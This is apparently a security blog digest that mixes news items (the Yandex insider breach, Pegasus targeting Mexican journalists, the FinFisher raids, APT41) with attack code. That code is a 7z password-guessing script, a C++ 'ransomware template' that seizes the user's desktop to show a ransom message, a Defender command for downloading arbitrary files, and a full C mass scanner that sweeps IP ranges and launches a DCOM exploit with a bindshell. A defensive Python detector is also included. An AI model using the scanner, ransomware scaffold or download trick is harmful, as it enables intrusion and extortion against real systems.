Email service provider Yandex on Friday, February 12, 2021, disclosed a data breach that compromised 4,887 email accounts of its users. The company blamed the incident on an unnamed employee, one of three system administrators with technical support access, who provided unauthorized access to users' mailboxes for personal gain. The company said the breach was identified during a routine audit of its systems by an internal security group.
7zip Password Cracker (BASH)
Dependency: p7zip GNU package.
#!/bin/bash
# @(#) p7crack -- Password crack a target 7z file
# Usage: ./p7crack.sh <target_file>
declare -a LIST=(password1 password2 password3)   # candidate passwords to try
for x in "${LIST[@]}"; do
    # 7z exits 0 only when the archive opens and extracts with this password
    if 7z x -y "$1" -p"$x" >/dev/null 2>&1; then
        echo "${x} is the password"
    fi
done
Generic Win32 Ransomware Template
The following is a basic (C++) program to build out Win32 ransomware projects. It will let you “control” a Windows session’s terminal/screen. The file encrypting, transporting, ransoming, destruction, etc., is left as an exercise to the reader.
#include <Windows.h>
#include <WinGDI.h>
void CreateWndContent0(HWND parent)
{
HWND wnd;
wnd = CreateWindowExW(NULL, L"BTN", L"btn", 0x50012F00, 50, 100, 200, 100, parent, (HMENU) IDC_BUTTON0, instance, NULL);
SendMessage(wnd, WM_SETFONT, (WPARAM) h_font, TRUE);
}
LRESULT CALLBACK WndProc0(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
switch (msg)
{
case WM_CREATE:
CreateWndContent0(hwnd);
break;
case WM_COMMAND:
switch (LOWORD(wparam))
{
case IDC_BUTTON0:
MessageBoxW(hwnd, L"BTN is clicked.", L"Event", MB_OK | MB_ICONINFORMATION);
SendMessageW(hwnd, WM_DESTROY, NULL, false);
break;
}
break;
case WM_SYSCOMMAND:
return true;
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, msg, wparam, lparam);
}
return FALSE;
}
HWND CreateWnd0()
{
HWND wnd;
wnd = CreateWindowExW(NULL, WND_CLASS_NAME0, L"window", WS_POPUP, 0, 0, 1920, 1080, NULL, NULL, instance, NULL);
// Get screen size dynamically for the win
hWindow0 = wnd;
SetWindowPos(wnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_SHOWWINDOW);
ShowWindow(wnd, SW_SHOWNORMAL);
UpdateWindow(wnd);
return wnd;
}
DWORD WINAPI Window0Thread( LPVOID param )
{
SetThreadDesktop(hDesktop); // New desktop where further windows created
RegisterClasses(WndProc0, WND_CLASS_NAME0);
CreateWnd0();
MessageLoop();
ExitThread(0);
}
namespace Window
{
bool CALLBACK HideWindowProc(HWND hwnd, LPARAM lParam)
{
if(GetAncestor(hwnd, 3) == hWindow0)
return true;
ShowWindow(hwnd, SW_HIDE);
return true;
}
bool Init(HINSTANCE hInstance)
{
instance = hInstance;
InitCommonControls();
h_font = CreateFontW(-13, 0, 0, 0, FW_NORMAL, 0,
0, 0, ANSI_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS,
DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"Times New Roman");
hWinsta = GetProcessWindowStation();
SetProcessWindowStation(hWinsta);
hDesktop = CreateDesktopW(L"Our ransomware message, give us all the bitcoins!", 0, 0, 0, GENERIC_ALL, NULL);
hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
SetThreadDesktop(hDesktop); // All windows created under this desktop.
SwitchDesktop(hDesktop); // Take control of what the user sees. Show them the message.
hThreadWindow0 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) &Window0Thread, 0, 0, 0);
return true;
}
void DeInit()
{
SwitchDesktop(hOldDesktop); // Restore the old, original, desktop. Because you're a nice boy ;)
CloseDesktop(hDesktop);
CloseWindowStation(hWinsta);
}
}
Mexican Cartels Deploying Lawful Intercept Software
A group known as the Cartel Project has released a report detailing the targeting of citizen journalists throughout Mexico who report on cartel dealings. Watchdog group Citizen Lab confirmed that journalist Jorge Carrasco was targeted with Pegasus, spyware made by the Israeli NSO Group.
The watchdog group has found at least nine journalists in Mexico targeted with the Pegasus software. While it is doubtful NSO Group entertains cartels for business, the Mexican government is a known customer of various “lawful intercept” software businesses, including NSO Group. It is likely the software ends up in the hands of cartel operators through insiders working within the Mexican government.
It is not known whether the eight journalists killed during 2020 in Mexico were targeted with such spyware.
FinFisher Raids
Sometime last week, between October 6 and 8 of 2020, customs, in conjunction with public prosecution, raided FinFisher company offices and private apartments in both Germany and Romania. A group of NGOs including NetzPolitik filed criminal complaints in Germany against the company, asserting the firm is exporting its malware products (used by German police) to foreign countries without obtaining permission.
Managing directors and employees, along with the company itself, are under active investigation for violating the Foreign Trade and Payments Act. These investigations began in summer 2019. Exporting German-made malware outside the country requires a license; without one, the exporter is criminally liable.
FinFisher has formally stated they never exported their software to Turkey, after a sample was found in 2017.
If the relevant authorities find evidence of exporting malware without a license, FinFisher may have a case brought against it in European court.
NetzPolitik did have a prior case against the firm for supposed violations which the NGO lost due to a preliminary injunction silencing their claims.
Chengdu 404
The US DOJ has listed several arrest warrants for Chinese nationals believed to be part of APT41 (Barium). This group is allegedly behind the ASUS hack, which led to hundreds of thousands of infections because the group used ASUS’s own code-signing certificate to push their malware through the company’s update servers.
Some of these infected hosts were targeted with ransomware and cryptojacking malware. The group has engaged in financially-motivated attacks since at least 2012 by targeting gaming companies for the procurement of game currency.
This group, which operated a front company named Chengdu 404, was likely coerced by Chinese state officials into traditional espionage activities while being allowed to continue its financial pursuits.
The group is not known to produce their own 0day exploits but are very quick to deploy new releases once an exploit is dropped, as they did in March 2020 with the Zoho ManageEngine exploit.
Chinese APT groups have traditionally had a reputation of government and corporate espionage for largely information purposes. It appears the Chinese state authorities are turning a blind eye to financially-focused groups so long as they perform actions on behalf of the Party in between their activities.
LoL – Microsoft Defender
Microsoft has graciously allowed users to download arbitrary executables with Microsoft Defender in a recent update: the behaviour is present from version 4.18.2007.9 through 4.18.2009.9, inclusive.
Command syntax: “mpcmdrun -DownloadFile -url <url> -path <path>”
With some luck we may get ubiquitous SSH access to all Windows workstations in the near future. It would greatly improve connectivity. Think of the possibilities!
Living off the Land is never going away and this is not a security incident. Just another proof point that administrators need to monitor the usage of such integrated tools to keep a full picture of how users, legitimate or compromised, are (ab)using their respective systems.
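As an added example (not from the original post), here is a small Python detection routine run over constructed process-creation records in Sysmon Event ID 1 / Security 4688 style. It flags MpCmdRun.exe -DownloadFile invocations whose source host, binary location or destination path deviate from routine Defender activity; the expected-host and expected-directory lists are assumptions to be baselined from your own telemetry.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample records, not real telemetry. 203.0.113.10 is a documentation
# address used as a stand-in for an attacker-controlled host.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice",
     "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate'},
    {"host": "ws02", "user": "CORP\\bob",
     "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r'MpCmdRun.exe -DownloadFile -url http://203.0.113.10/payload.exe -path C:\Users\Public\p.exe'},
    {"host": "ws03", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": r'MpCmdRun.exe -DownloadFile -url https://go.microsoft.com/fwlink/?LinkID=121721 -path C:\Temp\mpam-fe.exe'},
    {"host": "ws04", "user": "CORP\\carol",
     "image": r"C:\Windows\Temp\MpCmdRun.exe",
     "cmdline": r'mpcmdrun -downloadfile -url https://203.0.113.10/x -path "C:\Users\carol\my files\x"'},
]

# Assumptions for this example: hosts Defender itself is expected to fetch from, and the
# directories the genuine binary runs from. Tune both from your own baseline.
EXPECTED_HOSTS = {"go.microsoft.com", "definitionupdates.microsoft.com"}
EXPECTED_IMAGE_DIRS = ("c:\\program files\\windows defender\\",
                       "c:\\programdata\\microsoft\\windows defender\\platform\\")
STAGING_DIRS = ("c:\\users\\", "c:\\windows\\temp\\")

_DOWNLOAD_RE = re.compile(r"-downloadfile\b", re.IGNORECASE)
_URL_RE = re.compile(r'-url\s+"?([^\s"]+)', re.IGNORECASE)
_PATH_RE = re.compile(r'-path\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


@dataclass
class Finding:
    host: str
    user: str
    url: str
    dest: str
    reasons: list = field(default_factory=list)


def analyze_event(ev):
    """Return a Finding for every MpCmdRun -DownloadFile call (reasons stays empty when
    it looks like routine Defender activity), or None when the event is not such a call."""
    image = ev["image"].lower()
    cmd = ev["cmdline"]
    if not image.endswith("mpcmdrun.exe") or not _DOWNLOAD_RE.search(cmd):
        return None
    url_m, path_m = _URL_RE.search(cmd), _PATH_RE.search(cmd)
    url = url_m.group(1) if url_m else ""
    dest = (path_m.group(1) or path_m.group(2)) if path_m else ""
    f = Finding(ev["host"], ev["user"], url, dest)
    src_host = urlparse(url).hostname or ""
    if src_host not in EXPECTED_HOSTS:
        f.reasons.append(f"download from non-Microsoft host {src_host or '?'}")
    if not image.startswith(EXPECTED_IMAGE_DIRS):
        f.reasons.append("MpCmdRun.exe running from an unexpected location (copied binary?)")
    if dest.lower().startswith(STAGING_DIRS):
        f.reasons.append("destination is a user-writable staging directory")
    return f


def scan(events):
    """Only the findings that carry at least one reason, i.e. the ones worth an analyst's time."""
    return [f for f in map(analyze_event, events) if f is not None and f.reasons]
```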
Example C “Wormable” Scanner
This tool is old, but it is an example of how even novice practitioners can have a damaging impact on computer systems.
It was used by several underground groups and purportedly compromised a seven-figure number of computer systems around the world at the time of the infamous DCOM vulnerability in 2003/2004.
It relies on advanced exploitation and bug discovery by other groups, but it was prepared ahead of release because the Polish group who discovered the bug gave roughly three weeks' notice before dropping the 0day. Surely this group was not the only one with such tools ready to go, with further payloads for after a shell was acquired 😉
Before the advent of services like Shodan, groups would pre-scan large address ranges if they knew something was coming and/or they were on the cusp of finding vulnerabilities in a particular service. ISPs were not so strict back then, so you could easily do this from home with no issues.
DCOM changed the way ISPs looked at port scanning policies. While not violating national laws they felt it was their moral duty to prevent enumeration techniques as much as possible.
/****************************** Windows DCOM Universal Scanner ******************************
 * Coded by Dominatus<[email protected]>
 *
 * This exploit was found by LSD<www.lsd-pl.net>
 * The program to exploit Win2k and WinXP universally was oc192.us Security.
 * I wrote this scanner though, which is what you are looking at right now.
 *
 * Please stop by irc.undernet.org/#kracknet and check out www.kracknet.org (which isn't finished
 * yet), and please check out www.hbx.us, which has free shell accounts, and currently hairball
 * needs some money to keep it up, so please help if you use his services. Check out
 * www.skope6.com, we're a new security group. We post a lot of computer and security
 * information. Come talk with us at irc.undernet.org/#skope6
 *
 * Note: Some ISPs block port 135, so you may have problems finding machines on certain ranges
 *
 * What this program does is either scan for machines with <port> open, with the option to log
 * them to a file, or root the vulnerable IPs from a logfile from a scan, and exploits the OS
 * you choose.
 *
 * YOU TAKE FULL RESPONSIBILITY FOR WHAT YOU DO WITH THIS PROGRAM
 *********************************************************************************************/
#include <stdio.h>
#include <stdlib.h>      /* exit(), atoi() */
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <fcntl.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr(), inet_ntoa() */
#include <errno.h>
#define ACTIVE 1
#define NOT_ACTIVE 0
#define MAXIMUM_SOCKS 200
struct connection
{
int sock;
char status;
time_t scan_time;
struct sockaddr_in addr;
};
struct connection ConnectionList[MAXIMUM_SOCKS];
void catchsig();
void initialize_connection(char *logFile);
void check_connection(char logFile[256]);
void rootlog(char *logFile);
void usage(char *argv0)
{
fprintf(stderr, "\n\n\n Windows DCOM Universal Scanner\n");
fprintf(stderr, " Coded by Dominatus<[email protected]>\n\n");
fprintf(stderr, " A Production of Skope6 Research Group\n");
fprintf(stderr, " www.skope6.com irc.undernet.org/#skope6/#kracknet www.kracknet.org\n\n");
fprintf(stderr, "==============================================================================================================\n");
fprintf(stderr, "+-- Skope6 Team: dominatus, sybah, eaglex, icecow, hairball, deversify, provizon, brotroxer, and lazurus --+\n");
fprintf(stderr, "==============================================================================================================\n\n");
fprintf(stderr, "**************************************************************************\n");
fprintf(stderr, "Usage:\n\n");
fprintf(stderr, "%s [IP] <-p> <-t> <-r> <-l> <-b> <-s>\n\n", argv0);
fprintf(stderr, "[IP]: IP to begin scanning at (1.0.0.0 - 255.255.255.255)\n");
fprintf(stderr, "-p <port>: Scan/exploit hosts on this port number(default: 135)\n");
fprintf(stderr, "-t <timeout>: Timeout in seconds for sockets(default: 5)\n");
fprintf(stderr, "-r <logfile>: Root the servers from a -l <logfile>\n");
fprintf(stderr, "-l <logfile>: Log hosts with port (default: 135) open in a logfile\n");
fprintf(stderr, "-b <port>: Bindshell port(default: 666)\n");
fprintf(stderr, "-s <selection>: Pick which OS you would like to exploit\n");
fprintf(stderr, " Targets: (use this only with option -r <logfile>)\n");
fprintf(stderr, " 0 Windows 2000 (Universal)\n");
fprintf(stderr, " 1 Windows XP (Universal)(default)\n");
fprintf(stderr, "**************************************************************************\n\n");
fprintf(stderr, "Examples:\n\n");
fprintf(stderr, "%s 207.0.0.1 -l vulnhosts.txt\n", argv0);
fprintf(stderr, "%s -r vulnhosts.txt -s 0 -p 136\n\n", argv0);
exit(0);
}
int startA = 1, startB = 0, startC = 0, startD = 0;
int port = 135;
int root = 0;
int log = 0;
int selection = 1;
int timeout = 5;
int bindport = 666;
char logfile[256];
char *win2k = "Windows 2000 (Universal)";
char *winxp = "Windows XP (Universal)";
int main(int argc, char *argv[])
{
int done = 0;
int i;
int k;
int ns;
int ret;
int opt;
char IP[16];
time_t scan_time;
FILE *logFile;
if (argc < 2)
{
usage(argv[0]);
}
sscanf(argv[1], "%d.%d.%d.%d", &startA, &startB, &startC, &startD);
while ((opt = getopt(argc, argv, "p:t:r:l:s:b:")) != EOF)
{
switch (opt)
{
case 'p':
port = atoi(optarg);
break;
case 't':
timeout = atoi(optarg);
break;
case 'r':
strncpy(logfile, optarg, sizeof(logfile));
logFile = fopen(logfile, "r+");
if (logFile == NULL)
{
fprintf(stderr, "Unable to append to %s\n", logfile);
exit(1);
}
fclose(logFile);
root = 1;
break;
case 'l':
if (optarg == NULL)
usage(argv[0]);
strncpy(logfile, optarg, sizeof(logfile));
logFile = fopen(logfile, "a+");
if (logFile == NULL)
{
fprintf(stderr, "Unable to append to %s\n", logfile);
exit(1);
}
fclose(logFile);
log = 1;
break;
case 's':
selection = atoi(optarg);
break;
case 'b':
bindport = atoi(optarg);
break;
case '?':
usage(argv[0]);
break;
default:
usage(argv[0]);
}
}
if (!root)
if (strlen(argv[1]) > 15)
usage(argv[0]);
initialize_connection(logfile);
scan_time = time(0);
if (log && root)
{
fprintf(stderr, "You can\'t use the -l(log) and -r(root hosts from log) together\n");
exit(1);
}
if (!root)
{
if (startA > 255 || startB > 255 || startC > 255 || startD > 255)
usage(argv[0]);
if (startA < 1 || startB < 0 || startC < 0 || startD < 0)
usage(argv[0]);
}
if (root)
rootlog(logfile);
else
signal(SIGINT, catchsig);
while (!done)
{
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
if (ConnectionList[i].status == NOT_ACTIVE)
{
ConnectionList[i].sock = socket(AF_INET, SOCK_STREAM, 0);
if (ConnectionList[i].sock != -1)
{
ret = fcntl(ConnectionList[i].sock, F_SETFL, O_NONBLOCK);
if (ret == -1)
{
fprintf(stderr, "Unable to set O_NONBLOCK\n");
close(ConnectionList[i].sock);
}
else
{
memset((char *)IP, 0, sizeof(IP));
snprintf(IP, sizeof(IP), "%d.%d.%d.%d", startA, startB, startC, startD);
ConnectionList[i].addr.sin_addr.s_addr = inet_addr(IP);
if (ConnectionList[i].addr.sin_addr.s_addr == -1)
{
fprintf(stderr, "\nInvalid IP\n");
exit(1);
}
ConnectionList[i].addr.sin_family = AF_INET;
ConnectionList[i].addr.sin_port = htons(port);
ConnectionList[i].scan_time = time(0);
ConnectionList[i].status = ACTIVE;
startD++;
if (startD == 256)
{
if (startC < 255)
{
startD = 0;
startC++;
}
else
{
if (startB < 255)
{
startD = 0;
startC = 0;
startB++;
}
else
{
if (startA < 255)
{
startD = 0;
startC = 0;
startB = 0;
startA++;
}
else
{
fprintf(stderr, "Finished\n");
for (i = 0; i < MAXIMUM_SOCKS; i++)
close(ConnectionList[i].sock);
exit(0);
}
}
}
}
}
}
}
}
check_connection(logfile);
}
}
void catchsig()
{
int i;
fprintf(stderr, "\n\nCtrl+C caught\n");
fprintf(stderr, "Closing Connections...\n");
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
close(ConnectionList[i].sock);
}
fprintf(stderr, "Connections Successfully Closed\n");
exit(0);
}
void initialize_connection(char *logFile)
{
int i;
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
ConnectionList[i].status = NOT_ACTIVE;
memset((struct sockaddr_in *)&ConnectionList[i].addr, 0, sizeof(struct sockaddr_in));
}
fprintf(stderr, " Windows DCOM Universal Scanner\n");
fprintf(stderr, " coded by Dominatus<[email protected]>\n\n");
fprintf(stderr, " A Production of Skope6 Research Group\n");
fprintf(stderr, " www.skope6.com irc.undernet.org/#skope6/#kracknet www.kracknet.org\n\n\n");
if (!root)
{
fprintf(stderr, "Starting scan from %d.%d.%d.%d Port: %d Timeout: %d second(s)\n", startA, startB, startC, startD, port, timeout);
fprintf(stderr, "Press Ctrl+C to stop or Ctrl+Z to suspend\n\n");
}
}
void check_connection(char logFile[256])
{
int i;
int ret;
int selectionCheck = selection;
char IPaddress[16];
FILE *logf;
for (i = 0; i < MAXIMUM_SOCKS; i++)
{
if ((ConnectionList[i].scan_time < (time(0) - timeout)) && (ConnectionList[i].status == ACTIVE))
{
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
else if (ConnectionList[i].status == ACTIVE)
{
memset(ConnectionList[i].addr.sin_zero, 0, 8);
ret = connect(ConnectionList[i].sock, (struct sockaddr *)&ConnectionList[i].addr, sizeof(struct sockaddr_in));
strncpy(IPaddress, (char *)inet_ntoa(ConnectionList[i].addr.sin_addr), sizeof(IPaddress));
if (ret == -1)
{
if (errno == EISCONN)
{
fprintf(stderr, "%s\n", IPaddress);
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
if ((errno != EALREADY) && (errno != EINPROGRESS))
{
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
}
else
{
if (log)
{
logf = fopen(logFile, "a+");
fprintf(logf, "%s\n", IPaddress);
fclose(logf);
}
else
fprintf(stderr, "Host: %s\n", IPaddress);
close(ConnectionList[i].sock);
ConnectionList[i].status = NOT_ACTIVE;
}
}
}
}
void rootlog(char *logFile)
{
int selectionCheck = selection;
char IPaddress[256];
char exploitString[256];
FILE *logf;
logf = fopen(logFile, "r+");
fprintf(stderr, "\nHold Ctrl+C to quit\n");
while ((fgets(IPaddress, sizeof(IPaddress), logf)) != NULL)
{
if (selectionCheck == 0)
{
snprintf(exploitString, sizeof(exploitString), "./oc192-dcom -d %s -t %d -p %d -l %d", IPaddress, selectionCheck, port, bindport);
fprintf(stderr, "\nTrying to exploit %s using %s\n\n", IPaddress, win2k);
system(exploitString);
}
else if (selectionCheck == 1)
{
snprintf(exploitString, sizeof(exploitString), "./oc192-dcom -d %s -t %d -p %d -l %d", IPaddress, selectionCheck, port, bindport);
fprintf(stderr, "\nTrying to exploit %s using %s\n\n", IPaddress, winxp);
system(exploitString);
}
else
fprintf(stderr, "\nSomething Failed\n");
}
fprintf(stderr, "\nFinished\n");
exit(0);
}
Facebook Hating the Player
It is alleged in court filings that Facebook sought out NSO Group in October 2017 to purchase the right to use Pegasus capabilities on users of Onavo Protect.
Onavo Protect was a “free” VPN solution provided by Facebook. The catch was that Facebook was analyzing web traffic to detect usage of other apps. Monitoring the phones of users who had installed Onavo, as Facebook's representatives reportedly wanted, is not the main use case of Pegasus (a post-exploitation framework for iOS).
The need for Pegasus came from Facebook not having as much insight into user behavior via data collection on iOS as compared with Android. Thus, Facebook potentially wanted to use Pegasus to close the gap between the operating system data collection abilities.
Recently Facebook has been upset due to NSO Group releasing modules for customers which included a 0-click exploit against WhatsApp users.
Charitable Internet Companies, Slow Moving Governments
Mozilla, creator of the popular internet browser Firefox, made the bold move of re-enabling support for the outdated and very insecure (for governments especially) HTTPS encryption protocols TLS v1.0 and 1.1. Several known attacks exist against services exposed over these protocols that are realistically exploitable by nation-state attackers.
Many government sites around the world are still hosted using these long-outdated protocols despite being retired by all popular browsers back in October 2018. Qualys SSL Labs found over 97% of surveyed sites are supporting TLS v1.2+.
Still, at least 850,000 websites use these outdated protocols, allowing sophisticated attackers, at the least, to decrypt the web traffic of other users.
Due to various governments apparently not having the means to upgrade their infrastructure during the global virus pandemic known as “Corona”, Mozilla decided to re-enable support for these retired, forbidden protocols to allow sharing of information.